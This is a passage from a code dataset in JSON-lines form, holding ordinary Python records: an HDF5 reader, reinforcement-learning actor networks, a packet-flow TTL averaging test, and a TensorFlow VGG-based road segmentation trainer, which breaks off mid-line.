H5_SUBTYPE_ATTRIBUTE = H5Writer().H5_SUBTYPE_ATTRIBUTE\n H5_TYPES_ATTRUBUTES = [H5_TYPE_ATTRIBUTE, H5_SUBTYPE_ATTRIBUTE]\n\n def _open_file(self, name, path=None, h5_file=None):\n if h5_file is None:\n if not os.path.isfile(path):\n raise ValueError(\"%s file %s does not exist\" % (name, path))\n\n self.logger.info(\"Starting to read %s from: %s\" % (name, path))\n h5_file = h5py.File(path, 'r', libver='latest')\n return h5_file\n\n def _close_file(self, h5_file, close_file=True):\n if close_file:\n h5_file.close()\n\n def _log_success(self, name, path=None):\n if path is not None:\n self.logger.info(\"Successfully read %s from: %s\" % (name, path))\n\n\nclass H5GroupHandlers(object):\n H5_SUBTYPE_ATTRIBUTE = H5Writer().H5_SUBTYPE_ATTRIBUTE\n\n def read_dictionary_from_group(self, group, type=None):\n dictionary = dict()\n for dataset in group.keys():\n dictionary.update({dataset: group[dataset][()]})\n for attr in group.attrs.keys():\n dictionary.update({attr: group.attrs[attr]})\n if type is None:\n type = group.attrs[self.H5_SUBTYPE_ATTRIBUTE]\n else:\n return dictionary\n", "sub_path": "tvb_scripts/io/h5_reader_base.py", "file_name": "h5_reader_base.py", "file_ext": "py", "file_size_in_byte": 1535, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "tvb_scripts.utils.log_error_utils.initialize_logger", "line_number": 12, "usage_type": "call"}, {"api_name": "tvb_scripts.io.h5_writer.H5Writer", "line_number": 14, "usage_type": "call"}, {"api_name": "tvb_scripts.io.h5_writer.H5Writer", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 24, "usage_type": "call"}, {"api_name": "tvb_scripts.io.h5_writer.H5Writer", "line_number": 37, "usage_type": "call"}]} {"seq_id": "316572729", "text": "import torch\nimport torch.nn as nn\nfrom functools import reduce\n\nfrom catalyst.contrib.models import SequentialNet\nfrom catalyst.dl.initialization import create_optimal_inner_init, outer_init\nfrom catalyst.rl.agents.utils import normal_sample, normal_log_prob\nfrom catalyst.rl.agents.layers import StateNet, SquashingLayer, CouplingLayer\n\n# log_sigma of Gaussian policy are capped at (LOG_SIG_MIN, LOG_SIG_MAX)\nLOG_SIG_MAX = 2\nLOG_SIG_MIN = -10\n\n\nclass Actor(StateNet):\n \"\"\"\n Actor which learns deterministic policy.\n \"\"\"\n\n @classmethod\n def create_from_config(\n cls,\n state_shape,\n action_size,\n hiddens,\n layer_fn,\n activation_fn=nn.ReLU,\n dropout=None,\n norm_fn=None,\n bias=True,\n layer_order=None,\n residual=False,\n out_activation=None,\n memory_type=None,\n **kwargs\n ):\n assert len(kwargs) == 0\n # hack to prevent cycle imports\n from catalyst.contrib.modules import name2nn\n\n layer_fn = name2nn(layer_fn)\n activation_fn = name2nn(activation_fn)\n norm_fn = name2nn(norm_fn)\n out_activation = name2nn(out_activation)\n\n if isinstance(state_shape, int):\n state_shape = (state_shape, )\n\n if len(state_shape) in [1, 2]:\n # linear case: one observation or several one\n state_size = reduce(lambda x, y: x * y, state_shape)\n\n observation_net = SequentialNet(\n hiddens=[state_size] + hiddens,\n layer_fn=layer_fn,\n dropout=dropout,\n activation_fn=activation_fn,\n norm_fn=norm_fn,\n bias=bias,\n layer_order=layer_order,\n residual=residual\n )\n elif len(state_shape) in [3, 4]:\n # cnn case: one image or several one @TODO\n raise NotImplementedError\n else:\n raise NotImplementedError\n\n if memory_type == \"lama\":\n raise NotImplementedError\n elif memory_type == \"rnn\":\n raise NotImplementedError\n else:\n memory_net = None\n memory_out = hiddens[-1]\n\n head_net = SequentialNet(\n hiddens=[memory_out, action_size],\n layer_fn=nn.Linear,\n activation_fn=out_activation,\n norm_fn=None,\n bias=True\n )\n\n inner_init = create_optimal_inner_init(nonlinearity=activation_fn)\n observation_net.apply(inner_init)\n head_net.apply(outer_init)\n\n actor_net = cls(\n observation_net=observation_net,\n memory_net=memory_net,\n head_net=head_net\n )\n\n return actor_net\n\n\nclass GaussActor(nn.Module):\n \"\"\" Actor which learns mean and standard deviation of Gaussian\n stochastic policy. Actions obtained from the policy are squashed\n with (out_activation).\n \"\"\"\n\n def __init__(\n self,\n state_shape,\n action_size,\n hiddens,\n layer_fn,\n activation_fn=nn.ReLU,\n norm_fn=None,\n bias=True,\n out_activation=nn.Sigmoid\n ):\n super().__init__()\n # hack to prevent cycle imports\n from catalyst.contrib.modules import name2nn\n\n self.n_action = action_size\n\n layer_fn = name2nn(layer_fn)\n activation_fn = name2nn(activation_fn)\n norm_fn = name2nn(norm_fn)\n out_activation = name2nn(out_activation)\n\n state_size = reduce(lambda x, y: x * y, state_shape)\n\n self.feature_net = SequentialNet(\n hiddens=[state_size] + hiddens,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=norm_fn,\n bias=bias\n )\n self.policy_net = SequentialNet(\n hiddens=[hiddens[-1], action_size * 2],\n layer_fn=nn.Linear,\n activation_fn=None,\n norm_fn=None,\n bias=bias\n )\n self.squasher = SquashingLayer(out_activation)\n\n inner_init = create_optimal_inner_init(nonlinearity=activation_fn)\n self.feature_net.apply(inner_init)\n self.policy_net.apply(outer_init)\n\n def forward(self, observation, with_log_pi=False):\n observation = observation.view(observation.shape[0], -1)\n x = observation\n x = self.feature_net.forward(x)\n x = self.policy_net.forward(x)\n\n mu, log_sigma = x[:, :self.n_action], x[:, self.n_action:]\n log_sigma = torch.clamp(log_sigma, LOG_SIG_MIN, LOG_SIG_MAX)\n sigma = torch.exp(log_sigma)\n z = normal_sample(mu, sigma)\n log_pi = normal_log_prob(mu, sigma, z)\n action, log_pi = self.squasher.forward(z, log_pi)\n\n if with_log_pi:\n return action, log_pi, mu, log_sigma\n return action\n\n\nclass RealNVPActor(nn.Module):\n \"\"\" Actor which learns policy based on Real NVP Bijector.\n Such policy transforms samples from N(z|0,I) into actions and\n then squashes them with (out activation).\n \"\"\"\n\n def __init__(\n self,\n state_shape,\n action_size,\n hiddens,\n layer_fn,\n activation_fn=nn.ReLU,\n norm_fn=None,\n bias=True,\n out_activation=nn.Sigmoid\n ):\n super().__init__()\n # hack to prevent cycle imports\n from catalyst.contrib.modules import name2nn\n\n self.n_action = action_size\n\n layer_fn = name2nn(layer_fn)\n activation_fn = name2nn(activation_fn)\n norm_fn = name2nn(norm_fn)\n out_activation = name2nn(out_activation)\n\n state_size = reduce(lambda x, y: x * y, state_shape)\n\n self.feature_net = SequentialNet(\n hiddens=[state_size] + hiddens,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=norm_fn,\n bias=bias\n )\n self.embedding_net = SequentialNet(\n hiddens=[hiddens[-1], action_size * 2],\n layer_fn=layer_fn,\n activation_fn=None,\n norm_fn=norm_fn,\n bias=bias\n )\n\n self.coupling1 = CouplingLayer(\n action_size=action_size,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=None,\n bias=bias,\n parity=\"odd\"\n )\n self.coupling2 = CouplingLayer(\n action_size=action_size,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=None,\n bias=bias,\n parity=\"even\"\n )\n\n self.squasher = SquashingLayer(out_activation)\n\n inner_init = create_optimal_inner_init(nonlinearity=activation_fn)\n self.feature_net.apply(inner_init)\n self.embedding_net.apply(inner_init)\n\n def forward(self, observation, with_log_pi=False):\n observation = observation.view(observation.shape[0], -1)\n x = observation\n x = self.feature_net.forward(x)\n state_embedding = self.embedding_net.forward(x)\n\n mu = torch.zeros((observation.shape[0], self.n_action)).to(x.device)\n sigma = torch.ones_like(mu).to(x.device)\n z = normal_sample(mu, sigma)\n log_pi = normal_log_prob(mu, sigma, z)\n z, log_pi = self.coupling1.forward(z, state_embedding, log_pi)\n z, log_pi = self.coupling2.forward(z, state_embedding, log_pi)\n action, log_pi = self.squasher.forward(z, log_pi)\n\n if with_log_pi:\n return action, log_pi\n return action\n", "sub_path": "rl/agents/actor.py", "file_name": "actor.py", "file_ext": "py", "file_size_in_byte": 7526, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "catalyst.rl.agents.layers.StateNet", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 41, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 42, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 43, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 44, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 51, "usage_type": "call"}, {"api_name": "catalyst.contrib.models.SequentialNet", "line_number": 53, "usage_type": "call"}, {"api_name": "catalyst.contrib.models.SequentialNet", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "catalyst.dl.initialization.create_optimal_inner_init", "line_number": 85, "usage_type": "call"}, {"api_name": "catalyst.dl.initialization.outer_init", "line_number": 87, "usage_type": "argument"}, {"api_name": "torch.nn.Module", "line_number": 98, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 98, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 110, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 113, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 113, "usage_type": "name"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 121, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 122, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 123, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 124, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 126, "usage_type": "call"}, {"api_name": "catalyst.contrib.models.SequentialNet", "line_number": 128, "usage_type": "call"}, {"api_name": "catalyst.contrib.models.SequentialNet", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 137, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "catalyst.rl.agents.layers.SquashingLayer", "line_number": 142, "usage_type": "call"}, {"api_name": "catalyst.dl.initialization.create_optimal_inner_init", "line_number": 144, "usage_type": "call"}, {"api_name": "catalyst.dl.initialization.outer_init", "line_number": 146, "usage_type": "argument"}, {"api_name": "torch.clamp", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 156, "usage_type": "call"}, {"api_name": "catalyst.rl.agents.utils.normal_sample", "line_number": 157, "usage_type": "call"}, {"api_name": "catalyst.rl.agents.utils.normal_log_prob", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 166, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 166, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 178, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 178, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 181, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 181, "usage_type": "name"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 189, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 190, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 191, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 192, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 194, "usage_type": "call"}, {"api_name": "catalyst.contrib.models.SequentialNet", "line_number": 196, "usage_type": "call"}, {"api_name": "catalyst.contrib.models.SequentialNet", "line_number": 203, "usage_type": "call"}, {"api_name": "catalyst.rl.agents.layers.CouplingLayer", "line_number": 211, "usage_type": "call"}, {"api_name": "catalyst.rl.agents.layers.CouplingLayer", "line_number": 219, "usage_type": "call"}, {"api_name": "catalyst.rl.agents.layers.SquashingLayer", "line_number": 228, "usage_type": "call"}, {"api_name": "catalyst.dl.initialization.create_optimal_inner_init", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 240, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 241, "usage_type": "call"}, {"api_name": "catalyst.rl.agents.utils.normal_sample", "line_number": 242, "usage_type": "call"}, {"api_name": "catalyst.rl.agents.utils.normal_log_prob", "line_number": 243, "usage_type": "call"}]} {"seq_id": "11075906", "text": "import argparse\r\nimport sys\r\nimport os\r\nimport functools\r\nimport random\r\nimport statistics\r\n\r\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\r\n\r\nfrom IPAlgorithm import radix\r\nimport IPAlgorithm.MultiSourceTimedFlowAlgorithm\r\n\r\nfrom pyshark.packet import layer\r\nclass LayerFieldsContainer(layer.LayerFieldsContainer):\r\n def __new__(cls, main_field, *args, **kwargs):\r\n if hasattr(main_field, 'get_default_value'):\r\n obj = str.__new__(cls, main_field.get_default_value(), *args, **kwargs)\r\n else:\r\n obj = str.__new__(cls, main_field, *args, **kwargs)\r\n obj.fields = [main_field]\r\n return obj\r\nlayer.LayerFieldsContainer = LayerFieldsContainer\r\n\r\nTESTED_ASES = 10\r\n\r\ndef main(pickle_src, drop_rate, *args, **kwargs):\r\n packets, prefixes_set = IPAlgorithm.MultiSourceTimedFlowAlgorithm.get_packets_pcap(None, pickle_src)\r\n prefixes = list(prefixes_set)\r\n extract = getattr(IPAlgorithm.MultiSourceTimedFlowAlgorithm.MultiSourceTimedFlowAlgorithm, '_extract_ttl_diff')\r\n\r\n prefix_radix = radix.Radix()\r\n for prefix in prefixes:\r\n rnode = prefix_radix.add(prefix.exploded)\r\n rnode.data[\"count\"] = 0\r\n rnode.data[\"packets\"] = []\r\n\r\n for packet in packets:\r\n rnode = prefix_radix.search_best(packet.src.exploded)\r\n if rnode is None:\r\n continue\r\n rnode.data[\"count\"]+=1\r\n flow = functools.reduce(lambda x, y: str(x) + '-' + str(y),\r\n [packet.src, packet.src_port, packet.dst, packet.dst_port], packet)\r\n rnode.data[\"packets\"].append({'flow':flow, 'hop' : extract(packet.ttl)})\r\n\r\n top = {k : k.data['packets'] for k in prefix_radix.nodes() if k in sorted(prefix_radix.nodes(), key=lambda n:n.data['count'], reverse=True)[:TESTED_ASES]}\r\n\r\n # Remove flows\r\n all_flows, averages = calc_averages(top)\r\n number_to_remove = int(drop_rate * len(all_flows))\r\n removed_flows = random.sample(all_flows, number_to_remove)\r\n for AS, packets in top.items():\r\n new_packets = list(filter(lambda p: p['flow'] not in removed_flows, packets))\r\n top[AS] = new_packets\r\n\r\n _, new_averages = calc_averages(top)\r\n\r\n packet_variance = statistics.variance([averages[AS][0] - new_averages[AS][0] for AS in top])\r\n flow_variance = statistics.variance([averages[AS][1] - new_averages[AS][1] for AS in top])\r\n\r\n print(\"Packet variance: %f, Flow variance: %f\"%(packet_variance, flow_variance))\r\n\r\n\r\ndef calc_averages(ASToPackets):\r\n # Calculate flows and averages\r\n averages = {}\r\n all_flows = set()\r\n for AS in ASToPackets:\r\n packets = ASToPackets[AS]\r\n flows = set()\r\n flows_to_ttl = {}\r\n for packet in packets:\r\n flow = packet['flow']\r\n flows.add(flow)\r\n if flow not in flows_to_ttl:\r\n flows_to_ttl[flow] = packet['hop']\r\n\r\n all_flows = all_flows.union(flows)\r\n packet_average = sum(map(lambda packet: (packet['hop']), packets)) / len(packets)\r\n flows_average = sum([flows_to_ttl[flow] for flow in flows_to_ttl]) / len(flows_to_ttl)\r\n averages[AS] = (packet_average, flows_average)\r\n\r\n return all_flows, averages\r\n\r\n\r\nif (__name__ == \"__main__\"):\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('pickle_src', type=str)\r\n parser.add_argument('--drop_rate', type=float, default=0.5)\r\n\r\n args = parser.parse_args()\r\n main(**vars(args))\r\n", "sub_path": "Test and validation/test_average.py", "file_name": "test_average.py", "file_ext": "py", "file_size_in_byte": 3497, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 8, "usage_type": "call"}, {"api_name": "pyshark.packet.layer.LayerFieldsContainer", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pyshark.packet.layer", "line_number": 14, "usage_type": "name"}, {"api_name": "pyshark.packet.layer.LayerFieldsContainer", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pyshark.packet.layer", "line_number": 22, "usage_type": "name"}, {"api_name": "IPAlgorithm.MultiSourceTimedFlowAlgorithm.get_packets_pcap", "line_number": 27, "usage_type": "call"}, {"api_name": "IPAlgorithm.MultiSourceTimedFlowAlgorithm", "line_number": 27, "usage_type": "attribute"}, {"api_name": "IPAlgorithm.MultiSourceTimedFlowAlgorithm", "line_number": 29, "usage_type": "attribute"}, {"api_name": "IPAlgorithm.radix.Radix", "line_number": 31, "usage_type": "call"}, {"api_name": "IPAlgorithm.radix", "line_number": 31, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 42, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 51, "usage_type": "call"}, {"api_name": "statistics.variance", "line_number": 58, "usage_type": "call"}, {"api_name": "statistics.variance", "line_number": 59, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 87, "usage_type": "call"}]} {"seq_id": "598843195", "text": "import multiprocessing\nimport re\nimport os.path\nimport tensorflow as tf\nimport helper2_bev\nimport warnings\nfrom distutils.version import LooseVersion\nimport project_tests as tests\nfrom glob import glob\nimport numpy as np\nfrom skimage import io\nfrom skimage.transform import rescale, resize, downscale_local_mean\nimport cv2\nimport scipy.misc\nfrom PIL import Image\nimport random\n\n# Check TensorFlow Version\nassert LooseVersion(tf.__version__) >= LooseVersion('1.0'), 'Please use TensorFlow version 1.0 or newer. You are using {}'.format(tf.__version__)\nprint('TensorFlow Version: {}'.format(tf.__version__))\n\n# Check for a GPU\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found. Please use a GPU to train your neural network.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n\n\ndef load_vgg(sess, vgg_path):\n \"\"\"\n Load Pretrained VGG Model into TensorFlow.\n :param sess: TensorFlow Session\n :param vgg_path: Path to vgg folder, containing \"variables/\" and \"saved_model.pb\"\n :return: Tuple of Tensors from VGG model (image_input, keep_prob, layer3_out, layer4_out, layer7_out)\n \"\"\"\n # TODO: Implement function\n # Use tf.saved_model.loader.load to load the model and weights\n vgg_tag = 'vgg16'\n vgg_input_tensor_name = 'image_input:0'\n vgg_keep_prob_tensor_name = 'keep_prob:0'\n vgg_layer3_out_tensor_name = 'layer3_out:0'\n vgg_layer4_out_tensor_name = 'layer4_out:0'\n vgg_layer7_out_tensor_name = 'layer7_out:0'\n\n tf.saved_model.loader.load(sess, [vgg_tag], vgg_path)\n image_input = tf.get_default_graph().get_tensor_by_name(vgg_input_tensor_name)\n keep_prob = tf.get_default_graph().get_tensor_by_name(vgg_keep_prob_tensor_name)\n layer3_out = tf.get_default_graph().get_tensor_by_name(vgg_layer3_out_tensor_name)\n layer4_out = tf.get_default_graph().get_tensor_by_name(vgg_layer4_out_tensor_name)\n layer7_out = tf.get_default_graph().get_tensor_by_name(vgg_layer7_out_tensor_name)\n \n return image_input, keep_prob, layer3_out, layer4_out, layer7_out\ntests.test_load_vgg(load_vgg, tf)\n\n\ndef layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes):\n \"\"\"\n Create the layers for a fully convolutional network. Build skip-layers using the vgg layers.\n :param vgg_layer7_out: TF Tensor for VGG Layer 3 output\n :param vgg_layer4_out: TF Tensor for VGG Layer 4 output\n :param vgg_layer3_out: TF Tensor for VGG Layer 7 output\n :param num_classes: Number of classes to classify\n :return: The Tensor for the last layer of output\n \"\"\"\n # TODO: Implement function\n # 1x1 convolution of vgg layer 7\n layer7a_out = tf.layers.conv2d(vgg_layer7_out, num_classes, 1, \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # upsample\n layer4a_in1 = tf.layers.conv2d_transpose(layer7a_out, num_classes, 4, \n strides= (2, 2), \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # make sure the shapes are the same!\n # 1x1 convolution of vgg layer 4\n layer4a_in2 = tf.layers.conv2d(vgg_layer4_out, num_classes, 1, \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # skip connection (element-wise addition)\n layer4a_out = tf.add(layer4a_in1, layer4a_in2)\n # upsample\n layer3a_in1 = tf.layers.conv2d_transpose(layer4a_out, num_classes, 4, \n strides= (2, 2), \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # 1x1 convolution of vgg layer 3\n layer3a_in2 = tf.layers.conv2d(vgg_layer3_out, num_classes, 1, \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # skip connection (element-wise addition)\n layer3a_out = tf.add(layer3a_in1, layer3a_in2)\n # upsample\n nn_last_layer = tf.layers.conv2d_transpose(layer3a_out, num_classes, 16, \n strides= (8, 8), \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n return nn_last_layer\n#tests.test_layers(layers)\n\n\ndef optimize(nn_last_layer, correct_label, learning_rate, num_classes):\n \"\"\"\n Build the TensorFLow loss and optimizer operations.\n :param nn_last_layer: TF Tensor of the last layer in the neural network\n :param correct_label: TF Placeholder for the correct label image\n :param learning_rate: TF Placeholder for the learning rate\n :param num_classes: Number of classes to classify\n :return: Tuple of (logits, train_op, cross_entropy_loss)\n \"\"\"\n # TODO: Implement function\n # make logits a 2D tensor where each row represents a pixel and each column a class\n logits = tf.reshape(nn_last_layer, (-1, num_classes))\n correct_label = tf.reshape(correct_label, (-1,num_classes))\n # define loss function\n\n #cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits= logits, labels= correct_label))\n cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits= logits, labels= correct_label))\n # define training operation\n optimizer = tf.train.AdamOptimizer(learning_rate= learning_rate)\n train_op = optimizer.minimize(cross_entropy_loss)\n\n return logits, train_op, cross_entropy_loss\ntests.test_optimize(optimize)\n\n\ndef train_nn(sess, epochs, train_op, cross_entropy_loss, input_image, correct_label, keep_prob, learning_rate, iterator,seed):\n \"\"\"\n Train neural network and print out the loss during training.\n :param sess: TF Session\n :param epochs: Number of epochs\n :param batch_size: Batch size\n :param get_batches_fn: Function to get batches of training data. Call using get_batches_fn(batch_size)\n :param train_op: TF Operation to train the neural network\n :param cross_entropy_loss: TF Tensor for the amount of loss\n :param input_image: TF Placeholder for input images\n :param correct_label: TF Placeholder for label images\n :param keep_prob: TF Placeholder for dropout keep probability\n :param learning_rate: TF Placeholder for learning rate\n \"\"\"\n # TODO: Implement function\n next_element = iterator.get_next()\n sess.run(tf.global_variables_initializer())\n \n print(\"Training...\")\n #print()\n for i in range(epochs):\n #sess.run(iterator.initializer)\n print(\"EPOCH {} ...\".format(i+1))\n #for image, label in get_batches_fn(batch_size):\n #for i in batch_size:\n # _, loss = sess.run([train_op, cross_entropy_loss], \n # feed_dict={input_image: image, correct_label: label, keep_prob: 0.5, learning_rate: 0.0009})\n # print(\"Loss: = {:.3f}\".format(loss))\n #images = []\n #gt_images = []\n # Compute for 100 epochs.\n\n #sess.run(iterator.initializer)\n sess.run(iterator.initializer, feed_dict={seed: i})\n\n while True:\n try:\n image,label = sess.run(next_element)\n\n #print(\"build batch\")\n\n #print('image',image)\n #print('shape',image[0].shape)\n #print('label',label[0].shape)\n #images.append(image)\n #gt_images.append(label[0])\n #print(len(image))\n #print(len(label))\n\n except tf.errors.OutOfRangeError:\n break\n #images_np = np.array(images)\n #gt_images_np = np.array(gt_images)\n #print('shape images',images_np.shape)\n #print('shape images',images_np.shape)\n #print('loss')\n _, loss = sess.run([train_op, cross_entropy_loss], feed_dict={input_image: image, correct_label: label, keep_prob: 0.5, learning_rate: 0.0009})\n ##########\n print(\"Loss: = {:.5f}\".format(loss))\n\n\n\n\n\n#tests.test_train_nn(train_nn)\n\n# background_color = np.array([255, 0, 0])\n\n# def _parse_function(filename, label):\n# print('file',filename)\n# print('label',label)\n# image_shape = (160, 576)\n \n# image_string = tf.read_file(filename)\n# image_decoded = tf.image.decode_png(image_string)\n# #image_resized = tf.image.resize_images(image_decoded, [4, 4])\n# image_resized = tf.image.resize_images(image_decoded, image_shape)\n\n# label_string = tf.read_file(label)\n# label_decoded = tf.image.decode_png(label_string)\n# label_resized = tf.image.resize_images(label_decoded, image_shape)\n\n# print('label', label_resized)\n# print('background_color',background_color)\n# gt_bg = np.all(label_resized == background_color, axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n# #images.append(image)\n# #gt_images.append(gt_image)\n# return image_resized, gt_image\n\n# def _read_resize_py_function(filename, label):\n# background_color = np.array([255, 0, 0])\n# image_shape = (160, 576)\n# # image_shape = (40, 128)\n# #image_decoded = cv2.imread(filename.decode(), cv2.IMREAD_GRAYSCALE)\n# #image_decoded = cv2.imread(filename.decode())\n# #print(filename.decode())\n# image_decoded = io.imread(filename.decode())\n# #print('hello')\n# #print(image_decoded.shape )\n# #print(image_decoded)\n# image_resized = resize(image_decoded, image_shape)\n\n# label_decoded = io.imread(label.decode())\n# label_resized = resize(label_decoded, image_shape)\n# #print (image_resized.shape)\n# #return image_decoded, label\n# gt_bg = np.all(label_resized == background_color, axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n# #print('gt_bg')\n# #print(gt_bg)\n# #print('gt_image')\n# #print(gt_image)\n# #print (image_resized.shape)\n# #print (gt_image.shape)\n# return image_resized, gt_image\n\n\n\n# def _read_resize_py_function(filename):\n\n# background_color = np.array([255, 0, 0])\n\n# image_shape = (160, 576)\n\n# folder_img = \"/home/shared/datasets/kitti_road/data_road/training/image_2\"\n# image_decoded = io.imread(folder_img+\"/\"+filename.decode())\n# print(folder_img+\"/\"+filename.decode())\n# image_resized = resize(image_decoded, image_shape)\n# #print(\"dataset\", folder_img+\"/\"+filename.decode())\n# filename_gt = re.sub(r'(?is)_', '_road_', filename.decode())\n# folder_gt = \"/home/shared/datasets/kitti_road/data_road/training/gt_image_2\" \n# label_decoded = io.imread(folder_gt+\"/\"+filename_gt)\n# print(folder_gt+\"/\"+filename_gt)\n# label_resized = resize(label_decoded, image_shape)\n# #print (image_resized.shape)\n# #return image_decoded, label\n# gt_bg = np.all(label_resized == background_color, axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n# #print('gt_bg')\n# #print(gt_bg)\n# #print('gt_image')\n# #print(gt_image)\n# #print (image_resized.shape)\n# #print (gt_image.shape)\n# #return image_resized, gt_image\n# return image_resized, gt_image\n\ndef blockshaped(arr, nrows, ncols):\n \"\"\"\n https://stackoverflow.com/questions/16873441/form-a-big-2d-array-from-multiple-smaller-2d-arrays/16873755#16873755\n Return an array of shape (n, nrows, ncols) where\n n * nrows * ncols = arr.size\n\n If arr is a 2D array, the returned array looks like n subblocks with\n each subblock preserving the \"physical\" layout of arr.\n \"\"\"\n h, w = arr.shape\n return (arr.reshape(h//nrows, nrows, -1, ncols)\n .swapaxes(1,2)\n .reshape(-1, nrows, ncols))\n\ndef unblockshaped(arr, h, w):\n \"\"\"\n https://stackoverflow.com/questions/16873441/form-a-big-2d-array-from-multiple-smaller-2d-arrays/16873755#16873755\n Return an array of shape (h, w) where\n h * w = arr.size\n\n If arr is of shape (n, nrows, ncols), n sublocks of shape (nrows, ncols),\n then the returned array preserves the \"physical\" layout of the sublocks.\n \"\"\"\n n, nrows, ncols = arr.shape\n return (arr.reshape(h//nrows, -1, nrows, ncols)\n .swapaxes(1,2)\n .reshape(h, w))\n\n\n\n\n\ndef depth_read(filename, left, right, top, bottom):\n # loads depth map D from png file\n # and returns it as a numpy array,\n # for details see readme.txt\n #depth_png = np.array(Image.open(filename), dtype=int)#####no rezize\n depth_png = Image.open(filename)\n cropped = depth_png.crop( ( left, top, right, bottom ) ) # size: 576 X 160\n #cropped.show()\n depth_png = np.array(cropped, dtype=int)\n # make sure we have a proper 16bit depth map here.. not 8bit!\n #depth_png.show()\n assert(np.max(depth_png) > 255)\n depth = depth_png.astype(np.float) / 256.\n depth = 